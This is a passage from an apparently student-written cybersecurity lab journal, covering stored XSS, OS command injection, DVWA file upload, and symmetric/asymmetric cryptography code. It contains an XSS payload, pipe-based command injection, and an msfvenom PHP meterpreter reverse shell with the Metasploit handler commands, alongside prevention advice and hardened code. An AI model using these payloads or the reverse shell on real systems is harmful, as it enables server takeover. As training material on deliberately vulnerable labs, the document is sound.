straight into the HTML, so an XSS payload can be placed in any of these fields.

Here, I insert <script>alert(1)</script> into the comment field.

Now reload the page containing the comment: an alert box appears. We have successfully solved the
Stored XSS Lab.
Experiment 7

Aim - OS Command Vulnerability Lab.

Learning Objective -

Theory :

What is OS command injection?

OS command injection is also known as shell injection. It allows an attacker to execute operating system
(OS) commands on the server that is running an application, and typically fully compromise the
application and its data. Often, an attacker can leverage an OS command injection vulnerability to
compromise other parts of the hosting infrastructure, and exploit trust relationships to pivot the attack
to other systems within the organization.

How Does a Command Injection Attack Work?

Step 1

During this stage, threat actors locate a vulnerability in an application which allows them to run malicious
operating system commands.

Step 2

The attacker formulates a command designed to trigger the desired action within the host operating
system. Typically, they utilize an input mechanism such as HTML code, cookies, or form fields to inject
this command into the application.

Step 3

The browser interprets the command and it is translated to an operating system command on the host.
Threat actors can then execute specific commands on the host machine and the network of the infected
system.

Learning Outcome :

Conclusion:

Lab: OS command injection

This lab contains an OS command injection vulnerability in the product stock checker.
The application executes a shell command containing user-supplied product and store IDs and returns
the raw output from the command in its response.

To solve the lab, execute the whoami command to determine the name of the current user.

Viewing the details of a product shows detailed information about it, including a function to check the
stock available.

Using the stock checker returns results, but no parameters visibly change in the page. Something may be
happening in the request that is not shown, and this is where the tool Burp Suite comes in: a web proxy
used to analyse and modify requests.

As the screenshot above shows, capturing the request sent by the stock checker reveals two hidden
parameters, productId and storeId, that are used to fetch the information.

We now test for OS command injection on the hidden storeId parameter. A shell metacharacter lets several
commands be run at once; in the screenshot above a pipe character is used to run an OS command on the
back-end server. There are many other such characters, like &.
Our command runs successfully, as the screenshot shows, which confirms the OS command injection. Other
commands such as pwd, ls, uname -a or cat /etc/os-release can be tested the same way.

How to prevent OS command injection attacks

● Avoid passing user input to system calls - so that threat actors cannot insert characters into the
OS command.

● Set up input validation - to prevent attacks like XSS and SQL Injection.

● Create a white list - of possible inputs, to ensure the system accepts only pre-approved inputs.

● Use only secure APIs - when executing system commands, such as execFile()

● Stay up-to-date on security patches - Developers should stay up-to-date on the latest security
patches and updates for the systems and software they use. This can help prevent known
vulnerabilities from being exploited.
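The white-list and secure-API points above applied to the stock checker from the lab, as an added example that is not the lab's code: the command string a shell-based checker builds, beside a hardened version that validates the IDs and runs a helper with an argument list and no shell. The helper name stockcheck and the Python one-liner standing in for it are constructed so the example runs anywhere.

```python
import subprocess
import sys


def stock_command_vulnerable(product_id, store_id):
    """Command string built the way the vulnerable checker builds it.

    Handed to a shell (shell=True or os.system), any |, & or ; inside
    store_id is shell syntax, so a second command runs. Returned as text
    here, not executed, so the defect can be inspected safely."""
    return f"stockcheck {product_id} {store_id}"   # 'stockcheck' is a stand-in


def validate_id(value):
    """White-list check: IDs are short decimal strings and nothing else.
    Rejected input never reaches the operating system."""
    if not (value.isdigit() and len(value) <= 10):
        raise ValueError(f"invalid id: {value!r}")
    return value


def check_stock_safe(product_id, store_id):
    """Hardened checker: validate, then run the helper as an argv list with
    no shell, so no character in the IDs is interpreted (the execFile()
    pattern from the prevention list).

    The helper is a constructed Python one-liner that echoes its arguments."""
    argv = [sys.executable, "-c",
            "import sys; print('stock', sys.argv[1], sys.argv[2])",
            validate_id(product_id), validate_id(store_id)]
    result = subprocess.run(argv, capture_output=True, text=True, check=True)
    return result.stdout.strip()
```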
Experiment 8

Aim - Unvalidated file upload vulnerability lab.

Learning Objective -

Theory :

What are file upload vulnerabilities?

File upload vulnerabilities are when a web server allows users to upload files to its filesystem without
sufficiently validating things like their name, type, contents, or size. Failing to properly enforce
restrictions on these could mean that even a basic image upload function can be used to upload arbitrary
and potentially dangerous files instead. This could even include server-side script files that enable
remote code execution.

What is the impact of file upload vulnerabilities?

The impact of file upload vulnerabilities generally depends on two key factors:

● Which aspect of the file the website fails to validate properly, whether that be its size, type,
contents, and so on.

● What restrictions are imposed on the file once it has been successfully uploaded.

In the worst case scenario, the file's type isn't validated properly, and the server configuration allows
certain types of file (such as .php and .jsp) to be executed as code. In this case, an attacker could
potentially upload a server-side code file that functions as a web shell, effectively granting them full
control over the server.

Learning Outcome :

Conclusion:

Demonstration of File Upload Vulnerability

What is DVWA?

DVWA (Damn Vulnerable Web Application): DVWA is a deliberately vulnerable web application designed
for educational and training purposes in the field of cybersecurity. It contains various common web
application vulnerabilities that users can practice exploiting and securing in a controlled environment.
We will now create a PHP backdoor using msfvenom:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.124.78 lport=4545 -f raw

Copy the generated PHP payload and save it with a .php extension as File_hack.php on the desktop.

Go back to the DVWA lab and choose the File Upload option from the vulnerability menu.
Click the Browse button, select File_hack.php and click Upload; the file is uploaded into a directory on the
web server.
After the upload, DVWA shows the directory path where the file was stored. Copy the selected part and
paste it into the URL to execute the file.

hackable/uploads/File_hack.php

Before opening this URL in the browser, start the multi handler in the Metasploit framework using the
commands below. While the handler is running, open the URL of the PHP file in the browser. This provides
a meterpreter session 1.

localhost/DVWA/hackable/uploads/File_hack.php

msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.124.78
msf exploit(handler) > set lport 4545
msf exploit(handler) > run
meterpreter > sysinfo

How to prevent file upload vulnerabilities

● Check the file extension against a whitelist of permitted extensions rather than a blacklist of
prohibited ones. It's much easier to guess which extensions you might want to allow than it is to
guess which ones an attacker might try to upload.

● Make sure the filename doesn't contain any substrings that may be interpreted as a directory or
a traversal sequence (../).

● Rename uploaded files to avoid collisions that may cause existing files to be overwritten.

● Do not upload files to the server's permanent filesystem until they have been fully validated.
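The four prevention points above as one validation routine, an added example that is not DVWA's or the lab's code. The allow-list, size limit, magic-byte table and temporary staging directory are assumptions chosen for the demonstration.

```python
import os
import tempfile
import uuid

ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}   # allow-list, not a deny-list
MAX_BYTES = 2 * 1024 * 1024                           # assumed size limit
# Leading bytes of each allowed type, so the contents must match the extension:
# a PHP file renamed to .png fails here.
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff",
         "jpeg": b"\xff\xd8\xff", "gif": b"GIF8"}

# Constructed sample upload: a PNG signature followed by filler bytes.
SAMPLE_PNG = MAGIC["png"] + b"\x00" * 16


class UploadRejected(ValueError):
    pass


def validate_upload(filename, data):
    """Return the extension if the upload passes every check, else raise."""
    if not filename or len(data) > MAX_BYTES:
        raise UploadRejected("missing name or too large")
    # Reject separators and traversal sequences anywhere in the client name.
    if "/" in filename or "\\" in filename or ".." in filename:
        raise UploadRejected("path characters in filename")
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension {ext!r} not allowed")
    if not data.startswith(MAGIC[ext]):
        raise UploadRejected("content does not match declared type")
    return ext


def store_upload(filename, data, upload_dir=None):
    """Validate first, then write under a random server-chosen name so the
    client-supplied name never reaches the filesystem and nothing is
    overwritten. Files are staged in a fresh temp dir unless one is given."""
    ext = validate_upload(filename, data)
    upload_dir = upload_dir or tempfile.mkdtemp(prefix="uploads-")
    new_name = f"{uuid.uuid4().hex}.{ext}"
    # 'x' mode fails instead of overwriting if a collision ever happens.
    with open(os.path.join(upload_dir, new_name), "xb") as fh:
        fh.write(data)
    return new_name
```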

Experiment No 9

Aim - Symmetric and Asymmetric Cryptography.

Learning Objective - Differentiate between symmetric and asymmetric cryptography, and comprehend
their respective strengths and use cases.

Theory :
Symmetric and asymmetric cryptography are two fundamental techniques used to secure information
and communications. They differ in how keys are used for encryption and decryption:

Symmetric Cryptography:

● In symmetric cryptography, the same secret key is used for both encryption and decryption.

● The key must be kept confidential between the parties involved.

● Examples of symmetric algorithms include AES (Advanced Encryption Standard) and DES (Data
Encryption Standard).

Asymmetric Cryptography:

● Asymmetric cryptography uses a pair of keys, a public key, and a private key.

● The public key is openly shared and used for encryption, while the private key is kept secret and
used for decryption.

● It provides a secure way for two parties to communicate without needing a shared secret key.

● Examples of asymmetric algorithms include RSA (Rivest-Shamir-Adleman) and ECC (Elliptic Curve
Cryptography).

Learning Outcome :
Conclusion:

Symmetric -

Code

from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad


def generate_key():
    # AES-128 uses a 16-byte (128-bit) key.
    return get_random_bytes(16)


def encrypt(plain_text, key):
    # ECB mode: each 16-byte block is encrypted independently, so identical
    # plaintext blocks produce identical ciphertext blocks. Fine for showing
    # the key-sharing idea; production code uses an authenticated mode.
    cipher = AES.new(key, AES.MODE_ECB)
    # PKCS#7 padding brings the data up to a multiple of the block size.
    padded_data = pad(plain_text.encode('utf-8'), AES.block_size)
    encrypted_data = cipher.encrypt(padded_data)
    return encrypted_data


def decrypt(encrypted_data, key):
    cipher = AES.new(key, AES.MODE_ECB)
    decrypted_data = cipher.decrypt(encrypted_data)
    # unpad() raises ValueError if the padding is malformed.
    unpadded_data = unpad(decrypted_data, AES.block_size)
    return unpadded_data.decode('utf-8')


# Example usage:
if __name__ == "__main__":
    key = generate_key()
    plain_text = "Hello, this is an AES encryption example in Python!"

    encrypted_data = encrypt(plain_text, key)
    print("Encrypted:", encrypted_data.hex())

    decrypted_text = decrypt(encrypted_data, key)
    print("Decrypted:", decrypted_text)

Output :

Asymmetric -

Code
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding

# Generate RSA key pair (2048-bit modulus, public exponent 65537)
private_key = rsa.generate_private_key(
    public_exponent=65537,
    key_size=2048,
)

# Serialize private key to PEM format (unencrypted here; this part stays secret)
private_pem = private_key.private_bytes(
    encoding=serialization.Encoding.PEM,
    format=serialization.PrivateFormat.PKCS8,
    encryption_algorithm=serialization.NoEncryption()
)

# Serialize public key to PEM format (this part can be shared openly)
public_pem = private_key.public_key().public_bytes(
    encoding=serialization.Encoding.PEM,
    format=serialization.PublicFormat.SubjectPublicKeyInfo
)

# Example plaintext
message = b"Hello, RSA!"

# Encrypt the message using the RSA public key with OAEP padding
encrypted_message = private_key.public_key().encrypt(
    message,
    padding.OAEP(
        mgf=padding.MGF1(algorithm=hashes.SHA256()),
        algorithm=hashes.SHA256(),
        label=None
    )
)

# Decrypt the encrypted message using the RSA private key (same OAEP parameters)
decrypted_message = private_key.decrypt(
    encrypted_message,
    padding.OAEP(
        mgf=padding.MGF1(algorithm=hashes.SHA256()),
        algorithm=hashes.SHA256(),
        label=None
    )
)

print("Original Message:", message)
print("Encrypted Message:", encrypted_message)
print("Decrypted Message:", decrypted_message)

Output
Experiment No 10

Aim - Symmetric Encryption and Hashing.

Learning Objective - Understand the principles and applications of symmetric encryption for secure data
transmission, and grasp the concepts of hashing for data integrity verification.

Course Objectives -

Theory :
Symmetric Encryption:
Symmetric encryption involves the use of a single secret key to both encrypt and decrypt data. This
means that the same key is used for both the encryption of plaintext (original data) and the decryption
of ciphertext (encrypted data). The key must be kept confidential and shared securely between the
parties involved.
Here's how symmetric encryption works:

● Encryption: The plaintext is transformed into ciphertext using an encryption algorithm and the
secret key. The resulting ciphertext is unintelligible without the key.

● Decryption: To retrieve the original plaintext, the recipient uses the same key to decrypt the
ciphertext. The decryption algorithm reverses the encryption process, converting the ciphertext
back into plaintext.

● Examples of symmetric encryption algorithms include Advanced Encryption Standard (AES), Data
Encryption Standard (DES), and Triple DES (3DES).

Hashing:
Hashing, on the other hand, is a one-way function that converts input data (often called a message) into
a fixed-length value, usually displayed as a hexadecimal string. The resulting value is known as a hash
value or hash code.
Hashing is commonly used for data integrity verification and password storage:

● Data Integrity Verification: Hashing is used to generate hash values for files or messages. By
comparing hash values before and after transmission or storage, one can detect if the data has
been tampered with.
● Password Storage: Storing plain passwords in databases is insecure. Instead, systems hash
passwords and store the hash values. When a user logs in, their input is hashed and compared to
the stored hash to authenticate them.

Learning Outcome :
Conclusion:
Code :

from cryptography.fernet import Fernet
import hashlib


# Symmetric Encryption
# Fernet wraps AES-128-CBC with a random IV and an HMAC-SHA256 tag, so the
# same key both encrypts and authenticates the message.
def encrypt_message(key, message):
    cipher_suite = Fernet(key)
    encrypted_message = cipher_suite.encrypt(message.encode())
    return encrypted_message


def decrypt_message(key, encrypted_message):
    cipher_suite = Fernet(key)
    # decrypt() checks the HMAC first and raises InvalidToken if the
    # ciphertext was altered or a different key is used.
    decrypted_message = cipher_suite.decrypt(encrypted_message).decode()
    return decrypted_message


# Hashing
def hash_message(message):
    # SHA-256 produces a fixed 32-byte digest, shown as 64 hex characters.
    sha256 = hashlib.sha256()
    sha256.update(message.encode())
    hashed_message = sha256.hexdigest()
    return hashed_message


if __name__ == "__main__":
    # Symmetric Encryption
    key = Fernet.generate_key()
    message = "This is a secret message."

    encrypted_message = encrypt_message(key, message)
    decrypted_message = decrypt_message(key, encrypted_message)

    print(f"Original Message: {message}")
    print(f"Encrypted Message: {encrypted_message}")
    print(f"Decrypted Message: {decrypted_message}")

    # Hashing
    message_to_hash = "Hash this message."
    hashed_message = hash_message(message_to_hash)

    print(f"Message to Hash: {message_to_hash}")
    print(f"Hashed Message: {hashed_message}")

Output :
